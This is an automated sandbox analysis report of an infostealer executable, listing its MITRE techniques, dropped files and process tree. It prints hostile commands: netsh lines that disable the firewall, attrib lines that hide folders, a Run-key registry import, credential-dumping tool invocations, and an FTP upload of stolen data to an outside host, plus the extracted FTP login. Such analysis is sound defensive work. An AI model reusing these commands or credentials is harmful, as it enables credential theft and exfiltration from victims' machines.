aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097

Analysis

max time kernel
175s
max time network
185s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2022 04:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exe
Size

4.2MB
MD5

0fceb8d2c081bbc44857aa5691040515
SHA1

23fd85edd4bcb9b9e6ddb14dc8e2965380aa5783
SHA256

aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097
SHA512

3348bdfd23a695a4ffa65ba8cfd09ff4d85922236521eddc846bfcf33041db78056e35c43aa83ea799120a7fa60c203320b6b93354e723bb6f58b903f1854b3f
SSDEEP

49152:OK35iAwrepqkeke4UdDF2EwuYn8yaIb5aVieEjhK5D6bIi84yxba82qwX2Di9xoy:OK3QAwU7e4ElQJZ+9hIyjwGu9OBqTfiC

Score

10^/10

collection evasion persistence spyware stealer

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
ftp.freehostia.com
Port:
21
Username:
benowe4
Password:
jerry004

Signatures

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/4504-166-0x0000000000400000-0x0000000000439000-memory.dmp	MailPassView

Nirsoft 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4504-166-0x0000000000400000-0x0000000000439000-memory.dmp	Nirsoft

Executes dropped EXE 8 IoCs

Processes:

dro.exeunzip.exeAdobe1.exeAdbe1.exeBcro1.exeAcro1.exeAcropa2.exeqox.exe

pid process

1308 dro.exe
1868 unzip.exe
3704 Adobe1.exe
4504 Adbe1.exe
1168 Bcro1.exe
636 Acro1.exe
3504 Acropa2.exe
4932 qox.exe
Modifies Windows Firewall 1 TTPs 4 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

1980 netsh.exe
4496 netsh.exe
2096 netsh.exe
788 netsh.exe
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

2428 attrib.exe
2304 attrib.exe

pid	process
1308	dro.exe
1868	unzip.exe
3704	Adobe1.exe
4504	Adbe1.exe
1168	Bcro1.exe
636	Acro1.exe
3504	Acropa2.exe
4932	qox.exe

pid	process
1980	netsh.exe
4496	netsh.exe
2096	netsh.exe
788	netsh.exe

pid	process
2428	attrib.exe
2304	attrib.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exeWScript.execmd.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	WScript.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs

collection

Email Collection

T1114

Processes:

Adbe1.exeBcro1.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Adbe1.exe
Key opened	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Bcro1.exe

Adds Run key to start application 2 TTPs 14 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

regedit.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\loo3 = "c:\\Docume~1\\AllUse~1\\Msn\\Adobe\\ij2.bat"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS\Installed = "1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS\	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL\Installed = "1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI\Installed = "1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI\NoChange = "1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI\	regedit.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1136 taskkill.exe
1932 taskkill.exe

pid	process
1136	taskkill.exe
1932	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

Processes:

aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exe
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	cmd.exe

Runs .reg file with regedit 1 IoCs

Processes:

regedit.exe

pid process

4508 regedit.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

Adobe1.exeAcroRd32.exe

pid process

3704 Adobe1.exe
3704 Adobe1.exe
3660 AcroRd32.exe
3660 AcroRd32.exe
3660 AcroRd32.exe
3660 AcroRd32.exe

pid	process
4508	regedit.exe

pid	process
3704	Adobe1.exe
3704	Adobe1.exe
3660	AcroRd32.exe
3660	AcroRd32.exe
3660	AcroRd32.exe
3660	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

taskkill.exetaskkill.exeBcro1.exeAcro1.exe

description	pid	process
Token: SeDebugPrivilege	1136	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	1168	Bcro1.exe
Token: SeDebugPrivilege	636	Acro1.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

AcroRd32.exeAcropa2.exe

pid process

3660 AcroRd32.exe
3660 AcroRd32.exe
3660 AcroRd32.exe
3660 AcroRd32.exe
3504 Acropa2.exe

pid	process
3660	AcroRd32.exe
3660	AcroRd32.exe
3660	AcroRd32.exe
3660	AcroRd32.exe
3504	Acropa2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exeWScript.execmd.exeWScript.execmd.exeAcroRd32.exe

description	pid	process	target process
PID 1984 wrote to memory of 3184	1984	aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exe	WScript.exe
PID 1984 wrote to memory of 3184	1984	aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exe	WScript.exe
PID 1984 wrote to memory of 3184	1984	aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exe	WScript.exe
PID 3184 wrote to memory of 2868	3184	WScript.exe	cmd.exe
PID 3184 wrote to memory of 2868	3184	WScript.exe	cmd.exe
PID 3184 wrote to memory of 2868	3184	WScript.exe	cmd.exe
PID 2868 wrote to memory of 3660	2868	cmd.exe	AcroRd32.exe
PID 2868 wrote to memory of 3660	2868	cmd.exe	AcroRd32.exe
PID 2868 wrote to memory of 3660	2868	cmd.exe	AcroRd32.exe
PID 2868 wrote to memory of 1136	2868	cmd.exe	taskkill.exe
PID 2868 wrote to memory of 1136	2868	cmd.exe	taskkill.exe
PID 2868 wrote to memory of 1136	2868	cmd.exe	taskkill.exe
PID 2868 wrote to memory of 1308	2868	cmd.exe	dro.exe
PID 2868 wrote to memory of 1308	2868	cmd.exe	dro.exe
PID 2868 wrote to memory of 1308	2868	cmd.exe	dro.exe
PID 2868 wrote to memory of 1868	2868	cmd.exe	unzip.exe
PID 2868 wrote to memory of 1868	2868	cmd.exe	unzip.exe
PID 2868 wrote to memory of 1868	2868	cmd.exe	unzip.exe
PID 2868 wrote to memory of 2912	2868	cmd.exe	WScript.exe
PID 2868 wrote to memory of 2912	2868	cmd.exe	WScript.exe
PID 2868 wrote to memory of 2912	2868	cmd.exe	WScript.exe
PID 2912 wrote to memory of 432	2912	WScript.exe	cmd.exe
PID 2912 wrote to memory of 432	2912	WScript.exe	cmd.exe
PID 2912 wrote to memory of 432	2912	WScript.exe	cmd.exe
PID 432 wrote to memory of 1932	432	cmd.exe	taskkill.exe
PID 432 wrote to memory of 1932	432	cmd.exe	taskkill.exe
PID 432 wrote to memory of 1932	432	cmd.exe	taskkill.exe
PID 432 wrote to memory of 3704	432	cmd.exe	Adobe1.exe
PID 432 wrote to memory of 3704	432	cmd.exe	Adobe1.exe
PID 432 wrote to memory of 3704	432	cmd.exe	Adobe1.exe
PID 432 wrote to memory of 4504	432	cmd.exe	Adbe1.exe
PID 432 wrote to memory of 4504	432	cmd.exe	Adbe1.exe
PID 432 wrote to memory of 4504	432	cmd.exe	Adbe1.exe
PID 432 wrote to memory of 1168	432	cmd.exe	Bcro1.exe
PID 432 wrote to memory of 1168	432	cmd.exe	Bcro1.exe
PID 432 wrote to memory of 1168	432	cmd.exe	Bcro1.exe
PID 432 wrote to memory of 636	432	cmd.exe	Acro1.exe
PID 432 wrote to memory of 636	432	cmd.exe	Acro1.exe
PID 432 wrote to memory of 636	432	cmd.exe	Acro1.exe
PID 432 wrote to memory of 2096	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 2096	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 2096	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 788	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 788	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 788	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 1980	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 1980	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 1980	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 4496	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 4496	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 4496	432	cmd.exe	netsh.exe
PID 432 wrote to memory of 2428	432	cmd.exe	attrib.exe
PID 432 wrote to memory of 2428	432	cmd.exe	attrib.exe
PID 432 wrote to memory of 2428	432	cmd.exe	attrib.exe
PID 432 wrote to memory of 4508	432	cmd.exe	regedit.exe
PID 432 wrote to memory of 4508	432	cmd.exe	regedit.exe
PID 432 wrote to memory of 4508	432	cmd.exe	regedit.exe
PID 432 wrote to memory of 3504	432	cmd.exe	Acropa2.exe
PID 432 wrote to memory of 3504	432	cmd.exe	Acropa2.exe
PID 432 wrote to memory of 3504	432	cmd.exe	Acropa2.exe
PID 432 wrote to memory of 2968	432	cmd.exe	ftp.exe
PID 432 wrote to memory of 2968	432	cmd.exe	ftp.exe
PID 432 wrote to memory of 2968	432	cmd.exe	ftp.exe
PID 3660 wrote to memory of 4616	3660	AcroRd32.exe	RdrCEF.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

2304 attrib.exe
2428 attrib.exe

pid	process
2304	attrib.exe
2428	attrib.exe

C:\Users\Admin\AppData\Local\Temp\aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exe
"C:\Users\Admin\AppData\Local\Temp\aa3441ea0d98de567a55639ec78f0e617526894f0a437726249ad40a0ae0e097.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\users\public\Public Document\Adobe\page\002.vbs"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public Document\Adobe\page\aaaa3.bat" "
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2868

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\users\public\Public Document\Adobe\page\Bdoc.pdf"
4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3660

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
5⤵
PID:4616

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
5⤵
PID:2504

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
5⤵
PID:4028

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
5⤵
PID:2944

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
5⤵
PID:2176

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Acropa2.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\users\public\Public Document\Adobe\page\dro.exe
dro -d -p A1999666B2C3D4KD7123LS400S500201322419s080897654321 par.zip.aes
4⤵
- Executes dropped EXE
PID:1308

C:\users\public\Public Document\Adobe\page\unzip.exe
unzip.exe -o par.zip
4⤵
- Executes dropped EXE
PID:1868

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\users\public\Public Document\Adobe\page\yy3.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public Document\Adobe\page\aa3.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ftp.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\users\public\Public Document\Adobe\page\Adobe1.exe
Adobe1.exe /stext 001.001
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3704

C:\users\public\Public Document\Adobe\page\Adbe1.exe
Adbe1.exe /stext 002.002
6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
PID:4504

C:\users\public\Public Document\Adobe\page\Bcro1.exe
Bcro1.exe -f "003.003"
6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\users\public\Public Document\Adobe\page\Acro1.exe
Acro1.exe -f "004.004"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
6⤵
- Modifies Windows Firewall
PID:2096

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
6⤵
- Modifies Windows Firewall
PID:788

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
6⤵
- Modifies Windows Firewall
PID:1980

C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
6⤵
- Modifies Windows Firewall
PID:4496

C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\users\public\public document"
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2428

C:\Windows\SysWOW64\regedit.exe
regedit /s "monf1.reg"
6⤵
- Adds Run key to start application
- Runs .reg file with regedit
PID:4508

C:\users\public\Public Document\Adobe\page\Acropa2.exe
Acropa2.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3504

C:\Windows\SysWOW64\ftp.exe
ftp -i -v -s:203.ww2 ftp.freehostia.com
6⤵
PID:2968

C:\users\public\Public Document\Adobe\page\qox.exe
qox.exe /h /e /r /k /c /q /y *.* "C:\Documents and Settings\All Users\Msn\Adobe"
6⤵
- Executes dropped EXE
PID:4932

C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Documents and Settings\All Users\Msn"
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2304

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\aXkacFEBbHz4NDHAeO00\PCGWIN32.LI5
Filesize
5KB

MD5
d66431c071a5678e89bb051d13817332

SHA1
7ac828db5afc88dd4b6fb4b105d9ac0045a2c744

SHA256
4653f88677219f3bc81f4ab570e9d944c5b68a104a85e7cafac8ae71521167c1

SHA512
a5df26790d5603e1721f0e510693eef82c1718612ae294abcb5e693f3b152e44910acd826c21d70109807195d14367662f67fb71737c8ba963e147a30625bc23

Download Submit
C:\ProgramData\aXkacFEBbHz4NDHAeO00\PCGWIN32.LI5
Filesize
5KB

MD5
d66431c071a5678e89bb051d13817332

SHA1
7ac828db5afc88dd4b6fb4b105d9ac0045a2c744

SHA256
4653f88677219f3bc81f4ab570e9d944c5b68a104a85e7cafac8ae71521167c1

SHA512
a5df26790d5603e1721f0e510693eef82c1718612ae294abcb5e693f3b152e44910acd826c21d70109807195d14367662f67fb71737c8ba963e147a30625bc23

Download Submit
C:\ProgramData\aXkacFEBbHz4NDHAeO00\PCGWIN32.LI5
Filesize
10KB

MD5
d75e380dc6b49c802013a582f08ed4e3

SHA1
eb4937bb27615568d7c94051e00eb7bf6a1c3d4f

SHA256
0af31aff06e8ddf26fe6cea385440a0fea24a34542d8b068e3e5d57e9aceb7de

SHA512
9f39a56f8aea87c764d427fdb5c19166f5ab64c2f39a2b3e14d87f4c0bced4ac8c61486741b60a41f0e6e166f851fec9c7010229b6e8da652c2d416688aab95c

Download Submit
C:\ProgramData\aXkacFEBbHz4NDHAeO00\PCGWIN32.LI5
Filesize
12KB

MD5
18a803898decf58235118b43eba96bb2

SHA1
f2aaceb60442b9002f171ddee0ff41912512586f

SHA256
b0292ac51f94ed82ea66f496c7fb430da4a11ba8eb4ae594ec035d579afe95f7

SHA512
b91d62c2b833e55325a53c3badef570d9721c87bd7686b00a5bd2e48e2ed214b51f4ec0f4db753a8241465b2cd4deabfc6be309a031c81bf12e534c102cf1749

Download Submit
C:\ProgramData\aXkacFEBbHz4NDHAeO00\PCGWIN32.LI5
Filesize
15KB

MD5
7053ae44513e9fb4571fd0326d1374af

SHA1
4d89a301f7eb2214475bf9bef60de679da874a73

SHA256
95fdaccc83757eaf595e0b9dbeea1deed4b33bee526dd2d9dd0a2ec3915809e4

SHA512
6d87827c80588bca73260183d9061876e158c13186b7f5707bf2689432dd051122d7bca8d9e6b0b20965ed2555d7a9a77c3b965bbfe4f4fb1004477bd8ec2c15

Download Submit
C:\Users\Public\Public Document\Adobe\page\203.ww2
Filesize
112B

MD5
6234ed9a6d50e555969dc9834b25d4db

SHA1
e1d85072cbb1fcda292ce5e7de00cb91bc8f51c6

SHA256
93d2823fd19ba9a8109a7b72c5e1f7e2ca3368daf352744827b905ab507fdea6

SHA512
26f68d9eebbff3edc7d365dec44fe5b2c95ad96494cf3097ac7ee88dafba18e11a2368d6371f68549cb187999e767d32bd73d43f6a3846c243507612f123d4c3

Download Submit
C:\Users\Public\Public Document\Adobe\page\Acro1.exe
Filesize
930KB

MD5
e4796d934056f5f73ed8d4ef720bbded

SHA1
c7b8a3a71999200890f0cadde10b3df27931cb2b

SHA256
8fd8e618e3dda81cb03a2c125702243471c8ce1e0a29eda56226d67890cf421f

SHA512
7eb58779771eed73f0bde30476178ebd6d853166a30022684912b93446fe1ced5ee6d484cba5ce6b7e1da6d211a9b24190dbce933d0ab61d843cd350da8a3132

Download Submit
C:\Users\Public\Public Document\Adobe\page\Acropa2.exe
Filesize
156KB

MD5
2a6c92c59f349897550fc08f44d37dd9

SHA1
d012eb89bb2459c74f3d8905be1a225321fce7ee

SHA256
51b6dd1bf3c81ae23ab538d264e70409a129d9aacd9f94ad74c3d06283809568

SHA512
fcf858d1ef800b05c63fa68225f027ce8d1949357ba753bfcf0567e2b860f1afb7bc9b95267f34e9ad9c1ece5565dc28cd6ef3b8d610d813b3c6a68957ea790a

Download Submit
C:\Users\Public\Public Document\Adobe\page\Adbe1.exe
Filesize
221KB

MD5
9b1a2a1e76dbeb4b54dfb72b45a06385

SHA1
1db401fd8239e96c50bdd5b5df090700d06c3379

SHA256
558ad3e72f8e447306f755d7960e6eadcb3beba0c153961ebabb470652f4955f

SHA512
01cfccd38b69b84148d7886da50bb269f03ca35a010ec0cce5d300633f5f239097b4316977dbb2d51d29223ab888dbb03080b221b7ce169f38f40890b7fb7f8c

Download Submit
C:\Users\Public\Public Document\Adobe\page\Adobe1.exe
Filesize
1.8MB

MD5
0482e1516224b62c2c61cef68b205a70

SHA1
e9f3c1e81052672823ed3920f7877fba55638272

SHA256
dfb31573de3d3145c5f33d7b146fee1b511b3d8e35641805b760eb93d3174efa

SHA512
3ffd2b28aa4846b21debb425026832fa9086c51a8608f8b89c6df7952640db7c64407d199b4cbe4478de84dc08e32ee7e2cf8986c96ef7d68b48a937e9039108

Download Submit
C:\Users\Public\Public Document\Adobe\page\Bcro1.exe
Filesize
932KB

MD5
a4547cfa6e54c70478b4ce48f0c4a3db

SHA1
4c58d77d64acaa0ca38cf8ba565659e70e13773b

SHA256
833bb76d449b668542585167238e6ca9caf80e5cd41656157960d7d73c0f8548

SHA512
2dd848623fee7129c2628ae660282d9e5a2d03b86988dee91ea6671d85621c4dffb5b9bd96ef9cdc6d9812d63c7fd292c8b6215b85ccfde97a2c14a4860bf2d9

Download Submit
C:\Users\Public\Public Document\Adobe\page\aa3.bat
Filesize
2KB

MD5
3975d606ae0fb2cf824efa51497dbcfe

SHA1
b3af59272376497f18c622fb088ac8a7a726a4d7

SHA256
161e8005e39c288cad364d750ded37ea520fdb1a99585cab74281ac75898eaa2

SHA512
aefd4de59999d13b20d0c22c52c67d154289fa5bc9971911d775424e6e75c4f1db27f25dcbc245076d75d3d479fa0bfb0fd7e8e736839d897e5e73571d536e35

Download Submit
C:\Users\Public\Public Document\Adobe\page\dro.exe
Filesize
506KB

MD5
6a7359fe6a453c51da4257619a8b00b9

SHA1
c6b28e91665c23bd689bb6b94a5808624eb42ab7

SHA256
463aa6aba59b77d6c1990a119b55f378caa3597b8962803ce06696a4156453ed

SHA512
bee034968cb9c9bedf40ce9d79eb50cdd830fbaebaec21e3624609484f717f61fa5f3f026436d56a3e432066ac72ee1a1f8ecb7a029d0b39ab174c6460234d4f

Download Submit
C:\Users\Public\Public Document\Adobe\page\par.zip
Filesize
3.5MB

MD5
0cc1e92109e2806251241ffa1d5e716e

SHA1
3bb0a4fc80514ff575184a4f5c1f46d618729628

SHA256
79a124e0c428b759b5348d059fc8a5cac23db7d46ffc5ec967c4408606ab5315

SHA512
59e292798c7aad333aecc4b3887b5a18e55243ebf7f2dee5a06c00f2df2484f2e09f997d2dff133060d750359f5983fa5187beefbc0baa1cb8b1ca8b8b64f130

Download Submit
C:\Users\Public\Public Document\Adobe\page\par.zip.aes
Filesize
3.5MB

MD5
6cf4c8c9e003d0084d72dca357aab1d9

SHA1
6e56ba1b5c3ced8df4df2101d5a7163e85dc8834

SHA256
f45688d2d075e8105554977f96f6439ef2b0b9a882e4dc377712b18bc33b847f

SHA512
04b95105d3587068698351aa7f6c621fec4f0d0571d9303f376204a4bde83087ef9966d0a4f7decde4fe07da5ff1f6614d9b39c3d23a626c8bfb7bc30a61c70b

Download Submit
C:\Users\Public\Public Document\Adobe\page\qox.exe
Filesize
30KB

MD5
9f45d6316d06ec8fac0cf07279823dde

SHA1
576ea2d042112e80c1e2e86e62b0bd584dc06417

SHA256
f1f905558bd1b8fed7683b1de778e616b95c713027ad79e4921147d22ff1198a

SHA512
38a75b6c6cfed66cdea8f9dae022efa11356b90e172178161e989bc2fdd34fbb02cbfcf30fcae28fdbf57bcf0ad0a4b359b66731e51dba158f3d487cebf3aa26

Download Submit
C:\Users\Public\Public Document\Adobe\page\unzip.exe
Filesize
164KB

MD5
75375c22c72f1beb76bea39c22a1ed68

SHA1
e1652b058195db3f5f754b7ab430652ae04a50b8

SHA256
8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

SHA512
1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

Download Submit
C:\users\public\Public Document\Adobe\page\001.001
Filesize
3KB

MD5
f94dc819ca773f1e3cb27abbc9e7fa27

SHA1
9a7700efadc5ea09ab288544ef1e3cd876255086

SHA256
a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92

SHA512
72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

Download Submit
C:\users\public\Public Document\Adobe\page\002.vbs
Filesize
225B

MD5
d22fd317a14793dafd8aa0b1677d09cc

SHA1
b001602a7de42990ce89e879a4da2a68882fc028

SHA256
7d842bc639694f8240c162713a4f54e67d4356c5bbf645dd96fcb118bfce00bd

SHA512
fe12bd46912bf285c57ce4769154841089d24f52be1273f82e6f0ff96407263330ed2b12da53459a977b41833a77957e9d3843c493596bb2b34fca1b344dd123

Download Submit
C:\users\public\Public Document\Adobe\page\003.003
Filesize
400B

MD5
de4e5ff058882957cf8a3b5f839a031f

SHA1
